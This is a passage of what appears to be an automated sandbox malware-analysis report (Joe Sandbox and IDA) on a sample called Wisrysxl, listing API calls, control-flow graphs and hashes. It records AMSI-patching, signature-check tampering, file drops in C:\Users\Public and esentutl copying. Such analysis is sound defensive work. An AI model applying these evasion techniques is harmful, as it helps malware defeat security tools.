                                                                                                                                  • Part of subcall function 02AA894C: FreeLibrary.KERNEL32(02B17394,02B17394,BCryptVerifySignature,bcrypt,?,02B173D4,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6
                                                                                                                                • Sleep.KERNEL32(00004E20,UacScan,02B12F60,02ABB7B8,ScanString,02B12F60,02ABB7B8,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8,UacInitialize,02B12F60,02ABB7B8), ref: 02AB50EE
                                                                                                                                  • Part of subcall function 02AADC04: RtlInitUnicodeString.NTDLL ref: 02AADC2C
                                                                                                                                  • Part of subcall function 02AADC04: RtlDosPathNameToNtPathName_U.NTDLL(00000000,00000000,00000000,00000000), ref: 02AADC42
                                                                                                                                  • Part of subcall function 02AADC04: NtDeleteFile.NTDLL(?), ref: 02AADC61
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$Path$FreeSleep$FileLoadNameName_$AddressCloseDeleteInitProcStringUnicodeWrite
                                                                                                                                • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                                • API String ID: 3582580975-3926298568
                                                                                                                                • Opcode ID: 58481d66af84689258a663762aa2aa405e12c90e60a33bf732f5a8c689ce4e29
                                                                                                                                • Instruction ID: 81f57be009065d2b1fca8e5473a6cc384e79923456f2e0b985c48318bb128283
                                                                                                                                • Opcode Fuzzy Hash: 58481d66af84689258a663762aa2aa405e12c90e60a33bf732f5a8c689ce4e29
                                                                                                                                • Instruction Fuzzy Hash: 5343E535A8015DDFDF21EB65DE90ACE73FABF89304F5044A69409AB614DE30AE82CF51

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 11029 2aa894c-2aa8971 LoadLibraryW 11030 2aa89bb-2aa89c1 11029->11030 11031 2aa8973-2aa898b GetProcAddress 11029->11031 11032 2aa898d-2aa89ac call 2aa7d78 11031->11032 11033 2aa89b0-2aa89b6 FreeLibrary 11031->11033 11032->11033 11036 2aa89ae 11032->11036 11033->11030 11036->11033
                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNEL32(?,?), ref: 02AA8960
                                                                                                                                • GetProcAddress.KERNEL32(02B17394,BCryptVerifySignature), ref: 02AA897A
                                                                                                                                • FreeLibrary.KERNEL32(02B17394,02B17394,BCryptVerifySignature,bcrypt,?,02B173D4,00000000,02B173A8,02AAA587,ScanString,02B173A8,02AAA93C,ScanBuffer,02B173A8,02AAA93C,Initialize), ref: 02AA89B6
                                                                                                                                  • Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                • API String ID: 1002360270-4067648912
                                                                                                                                • Opcode ID: 0362f85ab789c2f5edfcba4d5110e71d71059863e727948752fa007bc2b5932d
                                                                                                                                • Instruction ID: 375e7038693f1e923f6d8c271ee5894ad44351785043d66ffcc0e945e811e2fe
                                                                                                                                • Opcode Fuzzy Hash: 0362f85ab789c2f5edfcba4d5110e71d71059863e727948752fa007bc2b5932d
                                                                                                                                • Instruction Fuzzy Hash: CBF0C271EC03049EE710A769BD89F57F7DCEB80B94F408D69BD0887148CF741852AB50

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNEL32(amsi), ref: 02AA88C1
                                                                                                                                  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                  • Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02AA8920
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                                                                                • String ID: DllGetClassObject$W$amsi
                                                                                                                                • API String ID: 2980007069-2671292670
                                                                                                                                • Opcode ID: 075d5dd7b05f51d0e8294f2b3137b00c88b52a3bfd69647e9f8f5cabb2026365
                                                                                                                                • Instruction ID: 8e76865082aa0fd2dacfc53d0faea36b8198ebc9a2b23e9927dd0c5cc6580cce
                                                                                                                                • Opcode Fuzzy Hash: 075d5dd7b05f51d0e8294f2b3137b00c88b52a3bfd69647e9f8f5cabb2026365
                                                                                                                                • Instruction Fuzzy Hash: 84F0816158C381B9D300E3748C55F4FBACD5F62664F008A18B1A89B2D2DA79D1048B67

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 11051 2a91a8f-2a91a9b 11052 2a91b6c-2a91b6f 11051->11052 11053 2a91aa1-2a91aa5 11051->11053 11054 2a91c5c-2a91c60 11052->11054 11055 2a91b75-2a91b7f 11052->11055 11056 2a91b08-2a91b11 11053->11056 11057 2a91aa7-2a91aae 11053->11057 11060 2a916e8-2a916f0 call 2a91644 11054->11060 11061 2a91c66-2a91c6b 11054->11061 11058 2a91b3c-2a91b49 11055->11058 11059 2a91b81-2a91b8d 11055->11059 11056->11057 11064 2a91b13-2a91b27 Sleep 11056->11064 11062 2a91adc-2a91ade 11057->11062 11063 2a91ab0-2a91abb 11057->11063 11058->11059 11073 2a91b4b-2a91b5f Sleep 11058->11073 11065 2a91b8f-2a91b92 11059->11065 11066 2a91bc4-2a91bd2 11059->11066 11077 2a916f5-2a9170b VirtualFree 11060->11077 11067 2a91ae0-2a91af1 11062->11067 11068 2a91af3 11062->11068 11069 2a91abd-2a91ac2 11063->11069 11070 2a91ac4-2a91ad9 11063->11070 11064->11057 11072 2a91b2d-2a91b38 Sleep 11064->11072 11074 2a91b96-2a91b9a 11065->11074 11066->11074 11076 2a91bd4-2a91bd9 call 2a914c0 11066->11076 11067->11068 11075 2a91af6-2a91b03 11067->11075 11068->11075 11072->11056 11073->11059 11078 2a91b61-2a91b68 Sleep 11073->11078 11079 2a91bdc-2a91be9 11074->11079 11080 2a91b9c-2a91ba2 11074->11080 11075->11055 11076->11074 11082 2a9170d-2a91714 11077->11082 11083 2a91716 11077->11083 11078->11058 11079->11080 11088 2a91beb-2a91bf2 call 2a914c0 11079->11088 11084 2a91bf4-2a91bfe 11080->11084 11085 2a91ba4-2a91bc2 call 2a91500 11080->11085 11086 2a91719-2a91723 11082->11086 11083->11086 11089 2a91c2c-2a91c59 call 2a91560 11084->11089 11090 2a91c00-2a91c28 VirtualFree 11084->11090 11086->11051 11088->11080
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNEL32(00000000), ref: 02A91B17
                                                                                                                                • Sleep.KERNEL32(0000000A,00000000), ref: 02A91B31
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                • Opcode ID: 7676accbb778b673b8ab1eb25dcc8b1f4126c94894dbc1774aaa4f0346fbf9c7
                                                                                                                                • Instruction ID: 779bebe5e396d866b3a44a182ad791cfb2fb473485dcbb8198eb6df3c9004dd6
                                                                                                                                • Opcode Fuzzy Hash: 7676accbb778b673b8ab1eb25dcc8b1f4126c94894dbc1774aaa4f0346fbf9c7
                                                                                                                                • Instruction Fuzzy Hash: 6551F2716412428FDF16CF6AC9C4756BBE1EF46314F5885AED54CCB282EB70C845CB91

                                                                                                                                Control-flow Graph

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02AA8814
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$CreateHandleModuleProcessUser
                                                                                                                                • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                                • API String ID: 952078031-2353454454
                                                                                                                                • Opcode ID: 3bfc1be02475786f4bba5be488f18f98917cb64a7dc9bd303df488f17de3aefc
                                                                                                                                • Instruction ID: b06e0337e7c4413bafb6542a76db6309d39b334ed31101fc8ac1ad83c13801da
                                                                                                                                • Opcode Fuzzy Hash: 3bfc1be02475786f4bba5be488f18f98917cb64a7dc9bd303df488f17de3aefc
                                                                                                                                • Instruction Fuzzy Hash: AF11E5B2680248BFEB40EFA9DD51F9A77EDEB4C740F514460BA08D3200CB34ED119B24
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6dd80c6151b330753b683fa1ef41da6c0a4f346333c08b743a574d238b43176b
                                                                                                                                • Instruction ID: c55af05366f60620b1b7157ac67e4ce5bec837caeda7dd8ed6fbec59e3f3fc37
                                                                                                                                • Opcode Fuzzy Hash: 6dd80c6151b330753b683fa1ef41da6c0a4f346333c08b743a574d238b43176b
                                                                                                                                • Instruction Fuzzy Hash: 7D41AB75C80204DFCF25DF2AE18839A7BE5FB4E364FA54969E8088B251CF309896CF51
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                  • Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
                                                                                                                                  • Part of subcall function 02AA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02AA83C2), ref: 02AA83A4
                                                                                                                                • FreeLibrary.KERNEL32(02B17388,00000000,00000000,00000000,00000000,02B1738C,Function_0000562C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,02B17388,00000000,00000000), ref: 02AA8AAA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressProc$CacheFlushFreeHandleInstructionLibraryMemoryModuleVirtualWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1648090374-0
                                                                                                                                • Opcode ID: 883a47233347ea55d3c87f10b75d3f290ede24607aee8649aa635c384f857e9a
                                                                                                                                • Instruction ID: 961f368736cfa9c8404a6591687bd2df35321a95c6ac17bbad1b5c1da1effc13
                                                                                                                                • Opcode Fuzzy Hash: 883a47233347ea55d3c87f10b75d3f290ede24607aee8649aa635c384f857e9a
                                                                                                                                • Instruction Fuzzy Hash: 502115706C0300BFEB40FBA5EE11B5EB7E9EF04B00F504590B505E7190DF7499419A19
                                                                                                                                APIs
                                                                                                                                • GetModuleFileNameA.KERNEL32(208A1B20,?,00000105), ref: 02A95886
                                                                                                                                  • Part of subcall function 02A95ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02A95AE8
                                                                                                                                  • Part of subcall function 02A95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95B06
                                                                                                                                  • Part of subcall function 02A95ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95B24
                                                                                                                                  • Part of subcall function 02A95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A95B42
                                                                                                                                  • Part of subcall function 02A95ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A95B8B
                                                                                                                                  • Part of subcall function 02A95ACC: RegQueryValueExA.ADVAPI32(?,02A95D38,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02A95BD1,?,80000001), ref: 02A95BA9
                                                                                                                                  • Part of subcall function 02A95ACC: RegCloseKey.ADVAPI32(?,02A95BD8,00000000,00000000,00000005,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95BCB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2796650324-0
                                                                                                                                • Opcode ID: b9746befce64e71ff07d12d308fb9915a3fb36454f89001aea748d68f1661a61
                                                                                                                                • Instruction ID: 8c04e23ef294845c9156600aec11a0d97864036628410415691c5bd2eee7d936
                                                                                                                                • Opcode Fuzzy Hash: b9746befce64e71ff07d12d308fb9915a3fb36454f89001aea748d68f1661a61
                                                                                                                                • Instruction Fuzzy Hash: 44E065B1E003149FCF10DFA8C9C1B8633D8AB08750F4449A1EC68CF24ADBB0DA248BE0
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,02AB356F,ScanString,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8,ScanBuffer,02B12F60,02ABB7B8,OpenSession,02B12F60,02ABB7B8,Initialize), ref: 02A97E8B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                • Instruction ID: 073201c03d8841efc3d9f29d8ba6fa61a67030536a69f6d5a498b966b6fbd832
                                                                                                                                • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                                • Instruction Fuzzy Hash: B4C08CF26212000E1E60A7BE1DC421942CD19881387601E21E438CA3C1EF1698232C30
                                                                                                                                APIs
                                                                                                                                • timeSetEvent.WINMM(?,00000000), ref: 02ABC36C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Eventtime
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2982266575-0
                                                                                                                                • Opcode ID: 10ccc95455cadb8173eb77a7e4dffe9c7779be288755ac6eacda0d7a33879a74
                                                                                                                                • Instruction ID: 024983de248156400142f06181e6d58df7c16f9741264c4129eb9c6e1c16af5b
                                                                                                                                • Opcode Fuzzy Hash: 10ccc95455cadb8173eb77a7e4dffe9c7779be288755ac6eacda0d7a33879a74
                                                                                                                                • Instruction Fuzzy Hash: 65C048F17907002AFA1196AA5CC2F66569EDB09B20F540652B604AA2D2DAA258108E68
                                                                                                                                APIs
                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 02A916A4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: c2f27099042f27100ea356a96599bbfd693fa2087500d95e0eb4cc991201113c
                                                                                                                                • Instruction ID: 3d9f24ee46d72f6e59b50435300233069c9cb45389a5e979da96727eb2fde9f7
                                                                                                                                • Opcode Fuzzy Hash: c2f27099042f27100ea356a96599bbfd693fa2087500d95e0eb4cc991201113c
                                                                                                                                • Instruction Fuzzy Hash: 6FF090B2B406956BDB119F5A9C80782BBD8FB00354F450139EA0897340D770A810CB94
                                                                                                                                APIs
                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02A91704
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000001A.00000002.1659943821.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A91000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_26_2_2a91000_Wisrysxl.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                • Opcode ID: c12a9271266879ac1d34b22450af2ff47fef9679e7293d44e04336d67062f251
                                                                                                                                • Instruction ID: 9e8c742f05d291db263b11df9fd4163bbac16b8f89f07bd6f0ae29b60dee247e
                                                                                                                                • Opcode Fuzzy Hash: c12a9271266879ac1d34b22450af2ff47fef9679e7293d44e04336d67062f251
                                                                                                                                • Instruction Fuzzy Hash: 02E04F75740302AFEB105A7E4D80712ABD9AB45664F244575F619DB2D1EAA0D8008B64